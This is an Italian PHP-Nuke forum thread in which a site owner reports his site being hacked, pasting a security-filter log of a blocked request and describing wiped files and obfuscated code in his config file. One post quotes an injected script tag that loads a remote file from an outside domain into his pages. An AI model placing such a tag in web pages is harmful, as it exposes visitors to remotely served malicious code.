TSmenu

Attualmente in www.tuttosoft.it è stata caricata la versione del nuke 7.9 TS sono presenti la bellezza di 78 categorie e 708 downloads       Utenti registrati:  13014    Admin del sito sono: 1  Ultimi 5 Utenti registrati :    fabiosa77    micos    Saverio1990    kingpit    salla

Ts Stats 1.0

Utenti :12964        ©   

Fai Una Donazione

Ultimi Inserimenti
Ultimi 20 file Inseriti in Ts Gallery




























































Site Approved

Pubblicità

Ts Gallery
CrackDown


Ultimi Posts
Ultimi 15 Messaggi nei Forums

Jeegoo
Ultimo messaggio di queen_live78 il 31-07-2010 alle 09:02:56

Script o modulo
Ultimo messaggio di queen_live78 il 25-07-2010 alle 01:11:39

Problemi con Javascript nei Contenuti di PHP nuke
Ultimo messaggio di Destino il 24-07-2010 alle 14:42:41

sfondo "contenuto"
Ultimo messaggio di omniasoft il 19-07-2010 alle 20:20:04

dynamics title
Ultimo messaggio di vecchio_joe il 16-07-2010 alle 23:44:01

Problema TS MENU
Ultimo messaggio di queen_live78 il 12-07-2010 alle 05:20:02

Menu verticale CSS
Ultimo messaggio di Dark_Side il 11-07-2010 alle 20:07:39

Consiglio per modulo news
Ultimo messaggio di amon il 11-07-2010 alle 11:42:53

SESSION in phpnuke
Ultimo messaggio di queen_live78 il 10-07-2010 alle 23:03:19

Chat per Phpbb
Ultimo messaggio di matteoiamma il 06-07-2010 alle 17:03:30

Modifiche al modulo web_links
Ultimo messaggio di red il 05-07-2010 alle 10:09:47

Come mettere un margine testo al titolo della news
Ultimo messaggio di Destino il 04-07-2010 alle 11:07:04

attivazione blocchi
Ultimo messaggio di Dark_Side il 25-06-2010 alle 16:27:54

Ban Permanete !!!!
Ultimo messaggio di Destino il 19-06-2010 alle 12:30:44

impostare sito web phpnuke in 2 lingue
Ultimo messaggio di vecchio_joe il 17-06-2010 alle 22:21:37


[ Tuttosoft.it Php Nuke Italian Community ]
Pubblicità

Pubblicità

Ts Tags Ver 1.0
Giovannib Splatt Chat 0.8.29 Ubuntu 9.10 Mappa sito Slaybook 1.2.1 Temi PhpBB Fonts Avatars Nuke Forum phbb3 V 3.0.4 Staff del sito Virit Antivirus Matteoiamma Nuke Sentinel 2.6.01 Installare Cairo-Dock su Ubuntu Linux a 64bit Addons Serpe76 PageRank 5 Karmik koala Nukelive 1.0 Weblord OpenId 0.3 new Sitemap Alexthemaster vea83inc Donazione Oracle su Linux Forums Php Nuke Notepad ++ Moduli Temi Phpnuke Directory Sottoscriviti Gnu License Tuttosoft Mascherare Mac-Address con Linux Banners Proxy su Linux Ubuntu Configurare la scheda di rete da terminale con Ubuntu Pilia Federico Ts Gallery Trucchi Nuke Più comandi in uno unico con Linux da terminale LGNuke 2.0.0RC Queen_live78 Ts Contacts Ranks Forum Php Nuke Ts Menu 5.3 Blocchi No Spam Attack 3.1 Installare Lamp su Ubuntu Linux

Tuttosoft.it Php Nuke Italian Community: Forums

TUTTOSOFT :: Leggi il Topic - attaco al sito? Benvenuti nel Forum di tuttosoft.it , per qualsiasi problema postate pure nel forum vi verrà data una risposta entro le 24 ore dal momento del Post. Buona Navigazione
 FAQFAQ   CercaCerca   Gruppi utentiGruppi utenti   ProfiloProfilo   Messaggi PrivatiMessaggi Privati   LoginLogin 

attaco al sito?

 
Nuovo Topic   Rispondi    Indice del forum -> Sicurezza
Precedente :: Successivo  
Autore Messaggio
nonsoloprogrammi
Maestro
Maestro


Registrato: Jan 17, 2009
Messaggi: 321
Località: guardia sanframondi

MessaggioInviato: Sab Ott 17, 2009 10:49 am    Oggetto: attaco al sito? Rispondi citando

ciao a tutti raga mi sa che questa volta mi anno attacato il sito ho ricevuto la seguente email:
Codice:

Data & Ora: 2009-10-17 03:00:10 CEST GMT +0200
IP Bloccato: 85.238.110.14
User ID: Anonimo (1)
Ragione: Abuse-Filter
--------------------
Browser Utente: Mozilla/4.0 (compatible; MSIE 5.01; Windows 95; MSIECrawler)
Stringa Query: www.nonsoloprogrammi.it/modules.php?name=Your_Account&op=new_user+[PLM=0][R]+GET+http://www.nonsoloprogrammi.it/modules.php?name=Your_Account&op=new_user+[0,25002,27019]+->+[R]+POST+http://www.nonsoloprogrammi.it/modules.php?name=Your_Account+[0,0,25232]+->+[L]+GET+http://www.nonsoloprogrammi.it/modules.php?name=Your_Account+[0,25537,26411]+->+[L]+POST+http://www.nonsoloprogrammi.it/modules.php?name=Your_Account+[0,0,25867]
Stringa Get: www.nonsoloprogrammi.it/modules.php
Stringa POST: www.nonsoloprogrammi.it/modules.php?name=Your_Account&op=new_user [0,25002,27019] -> [R] POST http://www.nonsoloprogrammi.it/modules.php?name=Your_Account [0,0,25232] -> [L] GET http://www.nonsoloprogrammi.it/modules.php?name=Your_Account [0,25537,26411] -> [L] POST http://www.nonsoloprogrammi.it/modules.php?name=Your_Account [0,0,25867]
Inoltrato Per: none
Client IP: none
Indirizzo remoto: 85.238.110.14
Porta Remota: 3386
Metodo Richiesta: GET
--------------------

e ora mi esce il sito tutto bianco cosa sia successo? ho nukesentinel la vecchia versione forse e successo qualcosa li? aiutatemi..
_________________
i miei siti http://www.nonsoloprogrammi.it http://www.mondophpnuke.com e http://www.chatgiovani.com
Torna in cima
Profilo Messaggio privato HomePage MSN Messenger
nonsoloprogrammi
Maestro
Maestro


Registrato: Jan 17, 2009
Messaggi: 321
Località: guardia sanframondi

MessaggioInviato: Sab Ott 17, 2009 12:17 pm    Oggetto: Rispondi citando

Raga sono riuscito a ripristinare tutto per fortuna avevo un backup del sito praticamente sapete che anno fatto hanno scaricato il sito aperto tutti i file e cancellato il contenuto e ricaricato tutto...
_________________
i miei siti http://www.nonsoloprogrammi.it http://www.mondophpnuke.com e http://www.chatgiovani.com
Torna in cima
Profilo Messaggio privato HomePage MSN Messenger
nonsoloprogrammi
Maestro
Maestro


Registrato: Jan 17, 2009
Messaggi: 321
Località: guardia sanframondi

MessaggioInviato: Sab Ott 17, 2009 8:10 pm    Oggetto: Rispondi citando

raga ho trovato nel mio altro sito anche lui attacato con lo stesso problema il seguente codice che era postato nel file config io non c'e avvevo meso poi e criptato e come aprivo il mio sito mi si attacava antivirus perche diceva che era stato trovato un malwin ecco il codice chi me lo riescie a decriptiare?il codice lo metto in allegato perche non vorrei che poi risultase questa pagina infettata www.nonsoloprogrammi.com/codice.txt
riuscite a capire di che si tratta??
_________________
i miei siti http://www.nonsoloprogrammi.it http://www.mondophpnuke.com e http://www.chatgiovani.com
Torna in cima
Profilo Messaggio privato HomePage MSN Messenger
nonsoloprogrammi
Maestro
Maestro


Registrato: Jan 17, 2009
Messaggi: 321
Località: guardia sanframondi

MessaggioInviato: Dom Ott 18, 2009 7:31 am    Oggetto: Rispondi citando

di nuovo un altro attacoi stamatina ora ho visto nel html del broweser escie questo <script src=http://hamnkrog.se/xmlrpc/LICENSE.php ></script>
chi mi aiuta???
_________________
i miei siti http://www.nonsoloprogrammi.it http://www.mondophpnuke.com e http://www.chatgiovani.com
Torna in cima
Profilo Messaggio privato HomePage MSN Messenger
Mostra prima i messaggi di:   
Nuovo Topic   Rispondi    Indice del forum -> Sicurezza Tutti i fusi orari sono GMT + 1 ora
Pagina 1 di 1

 
Vai a:  
Non puoi inserire nuovi Topic in questo forum
Non puoi rispondere ai Topic in questo forum
Non puoi modificare i tuoi messaggi in questo forum
Non puoi cancellare i tuoi messaggi in questo forum
Non puoi votare nei sondaggi in questo forum

Powered by phpBB © 2001, 2005 phpBB Group
Tema Creato da Queen_live78 © 2007